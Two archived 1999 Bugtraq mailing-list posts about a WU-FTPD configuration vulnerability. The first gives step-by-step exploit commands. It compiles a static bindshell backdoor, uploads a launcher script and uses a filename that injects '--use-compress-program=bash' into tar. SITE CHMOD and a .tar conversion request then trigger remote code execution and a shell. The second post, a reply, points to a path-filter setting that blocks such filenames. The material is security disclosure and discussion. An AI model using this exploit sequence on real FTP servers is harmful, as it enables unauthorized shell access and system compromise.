4607685 1999-12-21 23:00 /86 rader/ Postmaster
Mottagare: Bugtraq (import) <8979>
Ärende: More details on the WU-FTPD configuration vulnerability.
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Sender: suid@jawa.chilli.net.au
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.20.9912212308430.5808-100000@jawa.chilli.net.au>
Date: Tue, 21 Dec 1999 23:10:56 +1100
Reply-To: suid <suid@SUID.KG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: suid <suid@SUID.KG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Good evening all,
I have noticed that in my original Bugtraq posting/paper I mentioned
the possibility of executing arbitrary code if you actually have a
valid FTP only account on a system, but did not include specific info
on this.
I realise now that this information is more relevant than the
anonymous FTP exploit as it is the default configuration and many,
many people give users accounts on this kind of setup believing it to
be `secure'.
Please find below an addendum to my paper
(http://www.suid.kg/advisories/001.txt)
You can find this on the web with the rest of my stuff at the new
location http://www.suid.kg/ .
Merry Xmas,
suid@suid.kg
---
suid@suid.kg - an addendum to wu-ftpd configuration vulnerability
exploit information
Background:
In the initial advisory I mentioned that users with valid ftp
access only accounts may also execute arbitrary code. I did
not however include exploit information for this. This
information is now found below.
Exploit Information:
With a valid FTP account only the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end
(by default). Local exploit time.
The exploit goes along much the same lines as the anonymous
FTP exploit does:
Create a backdoor, using bindshell from our previous example:
$ gcc bindshell.c -o b -static
If you can perform a SITE CHMOD (default for normal non-anon
users on wu-ftpd), then you can use the following script
example. Create a script to exec the desired commands:
$ cat > blah
#!/bin/bash
./b &
^D
Now create empty file "--use-compress-program=bash blah"
$ > "--use-compress-program=bash blah"
FTP to your target, login with your username/password. Upload
your 3 files:
ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"
Do a SITE CHMOD for b and blah:
ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah
Now get your file:
ftp> get "--use-compress-program=bash blah".tar
Thats all there is to it. You now should have a shell on
whatever port you specified.
Merry Xmas!
(4607685) ------------------------------------------(Ombruten)
4611500 1999-12-23 19:54 /35 rader/ Postmaster
Mottagare: Bugtraq (import) <9015>
Ärende: Re: ftp conversions exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <19991222200112.A30322@walton.maths.tcd.ie>
Date: Wed, 22 Dec 1999 20:01:12 +0000
Reply-To: dwmalone@MATHS.TCD.IE
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: David Malone <dwmalone@MATHS.TCD.IE>
X-To: Desi Hacker <desihacker@HOTMAIL.COM>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991222044725.77471.qmail@hotmail.com>
On Wed, Dec 22, 1999 at 04:47:25AM +0000, Desi Hacker wrote:
> during the exploiting process.. the final step as instructed by the auther
> doesn't work
>
> ftp> get "--use-compress-program=sh blah".tar
> or
> ftp> get "--use-compress-program=sh blah".tar
>
> instead is gives a warning of permission denied!
> in case of anon ftp logging
The ftpaccess man page contains the following example line:
path-filter anonymous /etc/pathmsg ^[-A-Za-z0-9._]*$ ^\. ^-
which disallows filenames starting with . or - to anonymous users.
Maybe your ftpaccess line contains this?
David.
(4611500) ------------------------------------------